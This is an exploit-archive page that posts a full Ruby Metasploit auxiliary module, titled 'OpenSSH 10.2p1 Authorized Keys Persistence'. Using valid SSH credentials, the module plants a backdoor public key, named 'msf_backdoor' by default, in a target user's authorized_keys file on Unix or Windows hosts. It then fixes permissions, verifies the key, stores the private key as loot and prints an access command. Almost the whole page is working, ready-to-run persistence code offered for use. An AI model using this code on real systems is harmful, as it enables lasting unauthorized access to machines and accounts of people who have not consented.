Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

 

 

OpenSSH 10.2p1 Authorized Keys Persistence Tool
OpenSSH 10.2p1 Authorized Keys Persistence Tool
OpenSSH 10.2p1 Authorized Keys Persistence Tool

=============================================================================================================================================
| # Title OpenSSH 10.2p1 Authorized Keys Persistence Tool

=============================================================================================================================================
| # Title : OpenSSH 10.2p1 Authorized Keys Persistence via Valid Credentials |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.openssh.com/ |
=============================================================================================================================================

[+] References :

[+] Summary : This Metasploit Auxiliary module establishes persistent access to remote systems by adding an SSH public key to a target user's authorized_keys file after successful authentication.
The module requires valid SSH credentials (password or private key) and supports both Unix-like and Windows SSH environments.
It automatically detects the target platform, locates the appropriate authorized_keys file, safely deploys the key using atomic operations, enforces correct permissions, and optionally verifies persistence.
This technique aligns with MITRE ATT&CK T1098.004 (Account Manipulation: SSH Authorized Keys) and represents a post-authentication persistence mechanism, not an exploit.

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'json'

class MetasploitModule < Msf::Auxiliary

include Msf::Exploit::Remote::SSH
include Msf::Auxiliary::Report

# Declares the module metadata and registers its standard and advanced
# datastore options.
#
# @param info [Hash] metadata overrides merged through update_info
def initialize(info = {})
  module_info = update_info(
    info,
    'Name' => 'SSH Authorized Keys Persistence',
    'Description' => %q{
This module adds SSH public keys to authorized_keys files on remote
SSH servers to establish persistent access.

The module requires valid SSH credentials (password or private key)
and will add the specified public key to the target user's
authorized_keys file.

This is a persistence technique, not an exploit.
},
    'License' => MSF_LICENSE,
    'Author' => ['indoushka'],
    'References' => [
      ['URL', 'https://attack.mitre.org/techniques/T1098/004/'],
      ['URL', 'https://www.ssh.com/academy/ssh/authorized_keys']
    ],
    'Notes' => {
      'Stability' => [CRASH_SAFE],
      'Reliability' => [REPEATABLE_SESSION],
      'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]
    }
  )
  super(module_info)

  # Authentication inputs plus the source of the key that gets deployed.
  standard_options = [
    Opt::RPORT(22),
    OptString.new('USERNAME', [true, 'Username to authenticate with']),
    OptString.new('PASSWORD', [false, 'Password for authentication']),
    OptPath.new('SSH_PRIVATE_KEY', [false, 'SSH private key for authentication']),
    OptBool.new('GENERATE_KEYS', [false, 'Generate new SSH keys for persistence', true]),
    OptString.new('KEY_NAME', [false, 'Name for generated keys', 'msf_backdoor']),
    OptBool.new('VERIFY_PERSISTENCE', [false, 'Verify persistence after deployment', true]),
    OptString.new('CUSTOM_KEY', [false, 'Custom public key to deploy'])
  ]
  register_options(standard_options)

  # Connection tuning knobs.
  advanced_options = [
    OptInt.new('SSH_TIMEOUT', [false, 'SSH connection timeout', 30]),
    OptBool.new('ACCEPT_HOSTKEY', [false, 'Accept unknown SSH host keys', false])
  ]
  register_advanced_options(advanced_options)
end

# Module entry point: obtains the public key to deploy, pushes it to the
# target account and prints/saves a report.
#
# Failures are reported through print_error instead of being raised. Only
# StandardError subclasses are handled here, so Interrupt (Ctrl-C),
# SystemExit and other non-standard exceptions propagate to the caller
# instead of being silently swallowed.
#
# @return [void]
def run
  @results = {
    generated_keys: {},
    deployed_keys: [],
    errors: []
  }

  print_status("Starting SSH Key Persistence against #{rhost}:#{rport}")

  begin
    public_key = setup_persistence_keys
    if public_key.nil?
      print_error("Failed to setup persistence keys")
      return
    end

    if deploy_key_to_user(public_key)
      print_good("Persistence successfully established")
    else
      print_error("Failed to establish persistence")
    end
    # generate_report is a no-op when nothing was deployed.
    generate_report
  rescue ::Timeout::Error
    print_error("Connection timed out")
  rescue ::Net::SSH::Exception => e
    print_error("SSH Error: #{e.class} - #{e.message}")
  rescue ::StandardError => e
    print_error("Module failed: #{e.class} - #{e.message}")
    print_error("Backtrace: #{e.backtrace.join("\n")}") if datastore['VERBOSE']
  end
end

# Probes the SSH service with throw-away random credentials to see whether
# it answers at all.
#
# NOTE(review): connect_ssh is not defined in this file; it is assumed to be
# provided by an included mixin - confirm.
#
# @return [Exploit::CheckCode] Appears when the service answered (with or
#   without a session), Safe on connection timeout, Unknown otherwise
def check
  print_status("Checking SSH service on #{rhost}:#{rport}")

  begin
    throwaway_user = Rex::Text.rand_text_alpha(8)

    probe_opts = {
      'RHOST' => rhost,
      'RPORT' => rport,
      'USERNAME' => throwaway_user,
      'PASSWORD' => Rex::Text.rand_text_alphanumeric(16),
      'SSH_TIMEOUT' => 10,
      'VERBOSE' => false
    }
    probe_opts['VERIFY_HOST_KEY'] = :never if datastore['ACCEPT_HOSTKEY']

    session = connect_ssh(false, probe_opts)

    # Both outcomes mean the service is reachable; only the message differs.
    unless session
      print_warning("SSH service responded but authentication failed")
      return Exploit::CheckCode::Appears
    end

    session.close
    print_good("SSH service is accessible and accepts connections")
    return Exploit::CheckCode::Appears
  rescue Net::SSH::AuthenticationFailed
    print_good("SSH service accepts connections (authentication failed as expected)")
    return Exploit::CheckCode::Appears
  rescue Net::SSH::ConnectionTimeout
    print_error("SSH connection timeout")
    return Exploit::CheckCode::Safe
  rescue Net::SSH::Disconnect => e
    print_warning("SSH disconnected: #{e.message}")
    return Exploit::CheckCode::Unknown
  rescue => e
    vprint_error("SSH check error: #{e.class} - #{e.message}")
    return Exploit::CheckCode::Unknown
  end
end

# Picks the public key to deploy. Sources are tried in priority order:
# CUSTOM_KEY, then a freshly generated pair (GENERATE_KEYS), then the public
# half of SSH_PRIVATE_KEY when that file exists.
#
# @return [String, nil] the value returned by the selected helper, or nil
#   when no source is configured
def setup_persistence_keys
  supplied_key = datastore['CUSTOM_KEY']
  return validate_and_load_custom_key(supplied_key) if supplied_key && !supplied_key.empty?

  return generate_exploit_keys if datastore['GENERATE_KEYS']

  key_file = datastore['SSH_PRIVATE_KEY']
  return extract_public_key_from_private(key_file) if key_file && File.exist?(key_file)

  print_error("No key source specified. Use GENERATE_KEYS, CUSTOM_KEY, or SSH_PRIVATE_KEY")
  nil
end

# Generates a 4096-bit RSA key pair, stores both halves as loot, records the
# private key as a credential and remembers the details in
# @results[:generated_keys].
#
# The sshkey library is loaded lazily so a missing gem only affects this
# code path.
#
# @return [String, nil] the public key in OpenSSH format, or nil when a
#   StandardError occurs along the way
def generate_exploit_keys
  print_status("Generating persistence keypair")

  begin
    require 'sshkey'

    keypair = SSHKey.generate(
      type: 'RSA',
      bits: 4096,
      comment: "msf_#{Time.now.to_i}"
    )

    # Private half first: its loot path is what gets reported to the operator.
    private_loot = store_loot(
      'ssh.private.key',
      'text/plain',
      rhost,
      keypair.private_key,
      "#{datastore['KEY_NAME']}.pem",
      'SSH Private Key'
    )

    store_loot(
      'ssh.public.key',
      'text/plain',
      rhost,
      keypair.ssh_public_key,
      "#{datastore['KEY_NAME']}.pub",
      'SSH Public Key'
    )

    credential = {
      origin_type: :service,
      address: rhost,
      port: rport,
      service_name: 'ssh',
      private_type: :ssh_key,
      private_data: keypair.private_key,
      username: datastore['USERNAME'],
      workspace_id: myworkspace_id
    }
    create_credential(credential)

    @results[:generated_keys] = {
      private_key_path: private_loot,
      public_key: keypair.ssh_public_key,
      fingerprint: keypair.fingerprint
    }

    print_good("Generated persistence keypair")
    print_good(" Private key: #{private_loot}")
    print_good(" Fingerprint: #{keypair.fingerprint}")

    return keypair.ssh_public_key
  rescue => e
    print_error("Failed to generate keys: #{e.message}")
    return nil
  end
end

# Validates an operator-supplied public key and returns it stripped of
# surrounding whitespace.
#
# The key must be exactly one line of the form "<type> <base64> [comment]".
# Accepted types are ssh-rsa, ssh-dss, ssh-ed25519, ecdsa-sha2-nistp256/384/521
# and the two sk-*@openssh.com types. The pattern is anchored with \A/\z so a
# value containing extra lines cannot slip through and inject additional
# entries into authorized_keys.
#
# @param key_string [String, nil] candidate public key
# @return [String, nil] the stripped key, or nil when it is not valid
def validate_and_load_custom_key(key_string)
  candidate = key_string.to_s.strip

  key_line = %r{
    \A
    (?:ssh-(?:rsa|dss|ed25519)
      |ecdsa-sha2-nistp(?:256|384|521)
      |sk-(?:ssh-ed25519|ecdsa-sha2-nistp256)@openssh\.com)
    [ \t]+[A-Za-z0-9+/]+={0,3}     # base64 key blob
    (?:[ \t]+[^\r\n]*)?            # optional comment, single line only
    \z
  }x

  unless candidate =~ key_line
    print_error("Invalid SSH public key format")
    return nil
  end

  print_status("Using custom public key")
  candidate
end

# Derives the OpenSSH-format public key from a private key file using the
# sshkey library.
#
# @param private_key_path [String] path of the private key on the local host
# @return [String, nil] the public key line, or nil when reading or parsing
#   raises a StandardError
def extract_public_key_from_private(private_key_path)
  begin
    require 'sshkey'
    parsed_key = SSHKey.new(File.read(private_key_path))
    print_status("Extracted public key from private key")
    return parsed_key.ssh_public_key
  rescue => e
    print_error("Failed to extract public key: #{e.message}")
    return nil
  end
end

# Logs in as the configured USERNAME, works out where that account's
# authorized_keys file lives and appends the given public key to it.
# Successful deployments are appended to @results[:deployed_keys].
#
# @param public_key [String] public key line to install
# @return [Boolean] true when the key was deployed, false otherwise
def deploy_key_to_user(public_key)
  username = datastore['USERNAME']
  password = datastore['PASSWORD']
  key_file = datastore['SSH_PRIVATE_KEY']

  print_status("Deploying persistence key for #{username}")

  session = establish_ssh_connection(username, password, key_file)
  return false unless session

  begin
    platform = detect_platform(session)
    print_status("Detected platform: #{platform}")

    keys_path = get_auth_keys_path(username, platform, session)
    return false unless keys_path

    print_status("Target authorized_keys file: #{keys_path}")

    unless deploy_key_atomically(session, keys_path, public_key, username, platform)
      print_error("Failed to deploy key")
      return false
    end

    print_good("Key deployed to #{keys_path}")
    @results[:deployed_keys] << {
      username: username,
      path: keys_path,
      platform: platform,
      timestamp: Time.now.to_s
    }
    return true
  ensure
    # Runs on every exit path above, including the early returns.
    session.close if session
  end
end

# Opens an authenticated SSH session for the given account.
#
# A readable private key file takes precedence over the password. After
# connecting, a trivial "true" command is run as a liveness test; a failure
# of that test is only logged and the session is still returned.
#
# The original text of this method carried one more `end` than it opened,
# which closed the enclosing class early and left the file unparsable; the
# structure below is balanced.
#
# NOTE(review): connect_ssh is not defined in this file; it is assumed to be
# provided by an included mixin - confirm.
#
# @param username [String] account to log in as
# @param password [String, nil] password, used when no key file is usable
# @param ssh_key [String, nil] local path of a private key file
# @return [Object, nil] the session returned by connect_ssh, or nil when no
#   authentication method is available or the connection fails
def establish_ssh_connection(username, password, ssh_key)
  ssh_opts = {
    'RHOST' => rhost,
    'RPORT' => rport,
    'USERNAME' => username,
    'SSH_TIMEOUT' => datastore['SSH_TIMEOUT'],
    'VERBOSE' => false
  }
  ssh_opts['VERIFY_HOST_KEY'] = :never if datastore['ACCEPT_HOSTKEY']

  if ssh_key && File.exist?(ssh_key)
    ssh_opts['KEY_FILE'] = ssh_key
  elsif password
    ssh_opts['PASSWORD'] = password
  else
    print_error("No authentication method specified")
    return nil
  end

  ssh = connect_ssh(true, ssh_opts)
  unless ssh
    print_error("Failed to establish SSH connection")
    return nil
  end

  begin
    # Liveness test: run a no-op command and wait for its exit status.
    ssh.open_channel do |channel|
      channel.exec "true"
      channel.on_request("exit-status") do |_channel, _data|
        print_good("SSH connection established and active")
      end
    end
    ssh.loop(0.1)
  rescue => e
    # The channel test is best-effort; the session itself is still usable.
    vprint_error("Channel test failed: #{e.message}")
    print_good("SSH connection established (channel test optional)")
  end

  ssh
rescue Net::SSH::AuthenticationFailed
  print_error("Authentication failed for #{username}")
  nil
rescue Net::SSH::ConnectionTimeout
  print_error("Connection timeout for #{username}")
  nil
rescue Net::SSH::HostKeyMismatch => e
  print_error("Host key mismatch: #{e.fingerprint}")
  print_error("Set ACCEPT_HOSTKEY to true to accept unknown host keys")
  nil
rescue => e
  print_error("SSH connection error: #{e.message}")
  nil
end

# Guesses the remote platform by running small probe commands.
#
# Probe output is matched strictly so that error text from a foreign shell
# is not mistaken for a positive answer:
# * marker probes only count when a whole output line equals the marker
#   (a shell that echoes the failing command line does not match);
# * `uname -s` only counts when it prints a single bare word such as
#   "Linux"; an error sentence does not qualify.
#
# NOTE(review): the Cygwin/MinGW probe runs last, as in the original order,
# so it is only reached when every Unix and Windows probe fails - confirm
# whether such hosts should be classified before the Unix probes instead.
#
# @param ssh [#exec!] open SSH session
# @return [Symbol] :unix, :windows or :windows_cygwin (:unix when unsure)
def detect_platform(ssh)
  has_marker_line = lambda do |output, marker|
    output.to_s.each_line.any? { |line| line.strip == marker }
  end

  unix_probes = [
    "test -d /usr && echo UNIX",
    "test -d /etc && echo UNIX",
    "ls /proc 2>/dev/null && echo UNIX"
  ]
  return :unix if unix_probes.any? { |cmd| has_marker_line.call(ssh.exec!(cmd), 'UNIX') }

  # A real kernel name is one token; shell error messages contain spaces.
  kernel_name = ssh.exec!("uname -s 2>/dev/null").to_s.strip
  return :unix if kernel_name =~ /\A[A-Za-z][\w.\-]*\z/

  windows_marker_probes = [
    "cmd /c \"if exist C:\\Windows\\System32 echo WINDOWS\"",
    "powershell -Command \"if (Test-Path 'C:\\Windows') { Write-Output 'WINDOWS' }\" 2>$null"
  ]
  return :windows if windows_marker_probes.any? { |cmd| has_marker_line.call(ssh.exec!(cmd), 'WINDOWS') }

  # findstr prints the OS caption (e.g. "Microsoft Windows ..."), which is
  # mixed case, so this probe is matched case-insensitively.
  caption = ssh.exec!("wmic os get caption 2>nul | findstr /i windows").to_s
  return :windows if caption =~ /windows/i

  environment = ssh.exec!("uname -o 2>/dev/null").to_s.downcase.strip
  return :windows_cygwin if environment.include?('cygwin') || environment.include?('mingw')

  print_warning("Could not detect platform, defaulting to Unix")
  :unix
end

# Works out the authorized_keys path for the account on the given platform.
#
# Windows-like platforms: returns the first candidate whose parent directory
# exists or can be created (via ensure_directory_exists), falling back to
# the per-user profile path. Unix: asks the remote host for the account's
# home directory with several lookup commands and falls back to /root or
# /home/<user>.
#
# @param username [String] target account
# @param platform [Symbol] value returned by detect_platform
# @param ssh [#exec!] open SSH session
# @return [String, nil] path of the authorized_keys file, nil for an
#   unsupported platform
def get_auth_keys_path(username, platform, ssh)
  case platform
  when :windows, :windows_cygwin
    candidates = [
      "C:/Users/#{username}/.ssh/authorized_keys",
      "/home/#{username}/.ssh/authorized_keys",
      "C:/ProgramData/ssh/administrators_authorized_keys"
    ]

    usable = candidates.find do |candidate|
      ensure_directory_exists(ssh, File.dirname(candidate), username, platform)
    end
    return "C:/Users/#{username}/.ssh/authorized_keys" unless usable

    if usable.include?('ProgramData')
      print_warning("System authorized_keys location requires special permissions")
      print_warning("SSH may ignore this file if ACLs are not correctly set")
    end
    return usable

  when :unix
    home_lookups = [
      "getent passwd #{username} 2>/dev/null | cut -d: -f6",
      "eval echo ~#{username} 2>/dev/null",
      "awk -F: -v user=#{username} '$1 == user {print $6}' /etc/passwd 2>/dev/null",
      "perl -e '@u=getpwnam(\"#{username}\"); print \$u[7] if @u;' 2>/dev/null",
      "python3 -c \"import pwd; print(pwd.getpwnam('#{username}').pw_dir)\" 2>/dev/null",
      "python -c \"import pwd; print(pwd.getpwnam('#{username}').pw_dir)\" 2>/dev/null"
    ]

    home_dir = nil
    home_lookups.each do |lookup|
      answer = ssh.exec!(lookup).to_s.strip
      # An unexpanded "~user" means the shell did not know the account.
      next if answer.empty? || answer == "~#{username}"

      home_dir = answer
      break
    end

    return "#{home_dir}/.ssh/authorized_keys" if home_dir
    return '/root/.ssh/authorized_keys' if username == 'root'

    return "/home/#{username}/.ssh/authorized_keys"

  else
    print_error("Cannot determine authorized_keys path for platform: #{platform}")
    return nil
  end
end

# Appends the public key to the authorized_keys file at +path+ unless it is
# already listed, then fixes permissions and optionally verifies the result.
#
# Differences from the earlier revision:
# * no stand-alone "umask" command is sent - each exec! call runs as its own
#   remote command, so a umask set that way never applied to later commands;
# * the remote file is probed once instead of twice;
# * the backup is taken only when the file is actually going to be
#   rewritten, so re-running against a host that already has the key leaves
#   no extra backup file behind.
#
# @param ssh [#exec!] open SSH session (passed through to the helpers)
# @param path [String] remote authorized_keys path
# @param public_key [String] key line to install
# @param username [String] account that should own the file
# @param platform [Symbol] value returned by detect_platform
# @return [Boolean] true when the key is present afterwards, false on failure
def deploy_key_atomically(ssh, path, public_key, username, platform)
  clean_key = public_key.strip

  print_status("Deploying key to: #{path}")

  unless ensure_directory_exists(ssh, File.dirname(path), username, platform)
    print_error("Failed to create directory for #{path}")
    return false
  end

  had_file = file_exists?(ssh, path, platform)
  existing_keys = had_file ? read_authorized_keys(ssh, path, platform) : []

  if existing_keys.any? { |existing_key| existing_key.strip == clean_key }
    print_warning("Key already exists at #{path}")
    return true
  end

  # Best-effort safety copy; a failed backup does not abort the deployment.
  if had_file && !create_backup(ssh, path, platform)
    print_warning("Failed to create backup")
  end

  existing_keys << clean_key

  unless write_authorized_keys_atomically(ssh, path, existing_keys, platform)
    print_error("Failed to write keys to #{path}")
    return false
  end

  unless set_file_permissions(ssh, path, username, platform)
    print_warning("Failed to set permissions on #{path}")
  end

  if datastore['VERIFY_PERSISTENCE']
    unless verify_key_deployment(ssh, path, clean_key, platform)
      print_error("Verification failed: Key not found in #{path}")
      return false
    end
    print_good("Verification successful: Key found in #{path}")
  end

  true
end

# Reads the remote authorized_keys file and returns its entries.
#
# Lines are stripped; blank lines and lines starting with '#' are dropped.
#
# @param ssh [#exec!] open SSH session
# @param path [String] remote file path
# @param platform [Symbol] :windows selects `type`, anything else `cat`
# @return [Array<String>] key lines (empty when the command returns nothing)
def read_authorized_keys(ssh, path, platform)
  dump_cmd = platform == :windows ? "type \"#{path}\" 2>nul" : "cat \"#{path}\" 2>/dev/null"
  listing = ssh.exec!(dump_cmd)
  return [] unless listing

  listing.each_line.map { |raw| raw.strip }.reject do |entry|
    entry.empty? || entry.start_with?('#')
  end
end

# Writes +keys+ (one per line, newline-terminated) to a temporary file next
# to +path+ and then moves it over +path+.
#
# Windows: the content is shipped Base64-encoded and written as raw bytes by
# PowerShell, so the command stays on a single line regardless of how many
# keys there are, needs no quoting of the key text, and adds no byte-order
# mark. If that does not produce the temp file, a cmd.exe fallback echoes
# the keys line by line with cmd metacharacters caret-escaped.
#
# Other platforms: the content is written with printf inside single quotes
# (embedded single quotes are escaped) and moved with `mv -f`.
#
# @param ssh [#exec!] open SSH session
# @param path [String] remote authorized_keys path
# @param keys [Array<String>] complete list of lines to write
# @param platform [Symbol] :windows selects the Windows branch
# @return [Boolean] result of the final file_exists? probe on +path+, or
#   false when the temporary file could not be created
def write_authorized_keys_atomically(ssh, path, keys, platform)
  content = keys.join("\n") + "\n"

  if platform == :windows
    temp_path = "#{path}.tmp#{rand(10000)}"

    encoded = [content].pack('m0') # strict Base64, no line breaks
    ps_temp_path = temp_path.gsub("'", "''")
    echo_block =
      if keys.empty?
        'type nul'
      else
        escaped_lines = keys.map { |line| line.gsub(/[\^&|<>()]/) { |meta| "^#{meta}" } }
        "(#{escaped_lines.map { |line| "echo #{line}" }.join('&')})"
      end

    writers = [
      "powershell -NoProfile -Command \"[IO.File]::WriteAllBytes('#{ps_temp_path}', [Convert]::FromBase64String('#{encoded}'))\"",
      "#{echo_block} > \"#{temp_path}\""
    ]

    written = writers.any? do |writer|
      ssh.exec!(writer)
      file_exists?(ssh, temp_path, platform)
    end
    return false unless written

    ssh.exec!("move /Y \"#{temp_path}\" \"#{path}\" >nul 2>&1")
    return file_exists?(ssh, path, platform)
  end

  temp_path = "#{path}.tmp.#{rand(10000)}"
  # Close the quote, emit a quoted single quote, reopen: ' -> '"'"'
  quoted_content = content.gsub("'", "'\"'\"'")
  ssh.exec!("printf '%s' '#{quoted_content}' > '#{temp_path}' 2>/dev/null")
  return false unless file_exists?(ssh, temp_path, platform)

  ssh.exec!("mv -f '#{temp_path}' '#{path}' 2>/dev/null")
  file_exists?(ssh, path, platform)
end

# Asks the remote host whether +path+ exists (`if exist` on Windows,
# `test -f` elsewhere).
#
# @param ssh [#exec!] open SSH session
# @param path [String] remote path
# @param platform [Symbol] :windows selects the cmd.exe probe
# @return [Boolean, nil] true only when the command printed exactly EXISTS;
#   nil when the command produced no result object
def file_exists?(ssh, path, platform)
  probe =
    case platform
    when :windows
      "if exist \"#{path}\" (echo EXISTS) else (echo NOT_EXISTS)"
    else
      "test -f \"#{path}\" && echo EXISTS || echo NOT_EXISTS"
    end

  answer = ssh.exec!(probe)
  answer && answer.strip == 'EXISTS'
end

# Asks the remote host whether +path+ exists as a directory (`if exist` on
# Windows, `test -d` elsewhere).
#
# @param ssh [#exec!] open SSH session
# @param path [String] remote path
# @param platform [Symbol] :windows selects the cmd.exe probe
# @return [Boolean, nil] true only when the command printed exactly EXISTS;
#   nil when the command produced no result object
def directory_exists?(ssh, path, platform)
  probe =
    case platform
    when :windows
      "if exist \"#{path}\" (echo EXISTS) else (echo NOT_EXISTS)"
    else
      "test -d \"#{path}\" && echo EXISTS || echo NOT_EXISTS"
    end

  answer = ssh.exec!(probe)
  answer && answer.strip == 'EXISTS'
end
# Makes sure +dir+ exists on the remote host, creating it when necessary.
# On non-Windows platforms a newly created directory is set to mode 700 and
# chowned to +username+ (chown failures are ignored).
#
# @param ssh [#exec!] open SSH session
# @param dir [String] remote directory
# @param username [String] intended owner of the directory
# @param platform [Symbol] :windows selects cmd.exe syntax
# @return [Boolean] true when the directory exists afterwards
def ensure_directory_exists(ssh, dir, username, platform)
  # Nothing to create for an empty, current or root directory.
  return true if dir.empty? || dir == '.' || dir == '/'
  return true if directory_exists?(ssh, dir, platform)

  on_windows = platform == :windows
  make_dir = on_windows ? "mkdir \"#{dir}\" 2>nul" : "mkdir -p \"#{dir}\" 2>/dev/null"
  ssh.exec!(make_dir)

  return false unless directory_exists?(ssh, dir, platform)

  unless on_windows
    ssh.exec!("chmod 700 \"#{dir}\" 2>/dev/null")
    ssh.exec!("chown #{username} \"#{dir}\" 2>/dev/null || true")
  end
  true
end
# Copies +path+ to "<path>.backup_<unix timestamp>" on the remote host and
# confirms the copy with file_exists?.
#
# @param ssh [#exec!] open SSH session
# @param path [String] remote file to back up
# @param platform [Symbol] :windows selects `copy`, anything else `cp -p`
# @return [Boolean] true when the backup file exists afterwards
def create_backup(ssh, path, platform)
  backup_path = "#{path}.backup_#{Time.now.to_i}"

  copy_cmd =
    if platform == :windows
      "copy \"#{path}\" \"#{backup_path}\" >nul 2>&1"
    else
      "cp -p \"#{path}\" \"#{backup_path}\" 2>/dev/null"
    end
  ssh.exec!(copy_cmd)

  unless file_exists?(ssh, backup_path, platform)
    print_warning("Backup creation failed")
    return false
  end

  print_status("Created backup: #{backup_path}")
  true
end
# Restricts access to the authorized_keys file.
#
# Windows: strips inherited ACL entries with icacls, then grants full
# control to SYSTEM, the Administrators group and the user. Cygwin: chmod
# 600 on the file. Everything else: chmod 700 / chown on the parent
# directory (unless it is '.' or '/'), then chmod 600 / chown on the file.
# Command results are not inspected.
#
# @param ssh [#exec!] open SSH session
# @param path [String] remote authorized_keys path
# @param username [String] account that should own the file
# @param platform [Symbol] value returned by detect_platform
# @return [true] always
def set_file_permissions(ssh, path, username, platform)
  steps =
    case platform
    when :windows
      [
        "icacls \"#{path}\" /inheritance:r 2>nul",
        "icacls \"#{path}\" /grant:r \"SYSTEM\":F 2>nul",
        "icacls \"#{path}\" /grant:r \"*S-1-5-32-544\":F 2>nul", # Administrators group
        "icacls \"#{path}\" /grant:r \"#{username}\":F 2>nul"
      ]
    when :windows_cygwin
      ["chmod 600 \"#{path}\" 2>/dev/null"]
    else
      parent = File.dirname(path)
      unix_steps = []
      unless parent == '.' || parent == '/'
        unix_steps << "chmod 700 \"#{parent}\" 2>/dev/null"
        # chown without a group for better compatibility
        unix_steps << "chown #{username} \"#{parent}\" 2>/dev/null || true"
      end
      unix_steps << "chmod 600 \"#{path}\" 2>/dev/null"
      unix_steps << "chown #{username} \"#{path}\" 2>/dev/null || true"
      unix_steps
    end

  steps.each { |step| ssh.exec!(step) }
  true
end

# Confirms that +full_key+ is listed in the remote authorized_keys file.
#
# @param ssh [#exec!] open SSH session
# @param path [String] remote authorized_keys path
# @param full_key [String] exact key line expected in the file
# @param platform [Symbol] value returned by detect_platform
# @return [Boolean] true when a stripped entry equals +full_key+
def verify_key_deployment(ssh, path, full_key, platform)
  return false unless file_exists?(ssh, path, platform)

  read_authorized_keys(ssh, path, platform).any? { |entry| entry.strip == full_key }
end

# Saves a JSON summary of the run as loot and prints a human-readable
# overview of every deployed key. Does nothing when no key was deployed.
# A failure to store the loot is reported and does not stop the printout.
#
# @return [void]
def generate_report
  deployments = @results[:deployed_keys]
  return if deployments.empty?

  print_status("Generating persistence report")

  summary = {
    module: self.name,
    target: "#{rhost}:#{rport}",
    timestamp: Time.now.to_s,
    results: @results
  }

  begin
    saved_to = store_loot(
      'ssh.persistence.report',
      'application/json',
      rhost,
      JSON.pretty_generate(summary),
      "ssh_persistence_#{rhost}_#{Time.now.to_i}.json",
      'SSH Persistence Report'
    )
    print_good("Report saved: #{saved_to}")
  rescue => e
    print_error("Failed to save report: #{e.message}")
  end

  divider = "=" * 60
  print_line(divider)
  print_status("PERSISTENCE ESTABLISHED")
  print_line(divider)

  deployments.each do |entry|
    print_good("User: #{entry[:username]}")
    print_good(" Key location: #{entry[:path]}")
    print_good(" Platform: #{entry[:platform]}")

    # The access hint is only available when this run generated the key pair.
    private_key_path = @results[:generated_keys][:private_key_path]
    next unless private_key_path

    print_good(" Access command:")
    print_good(" ssh -i #{private_key_path} #{entry[:username]}@#{rhost}")
  end

  print_line(divider)
end
end

Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================
Social Media Share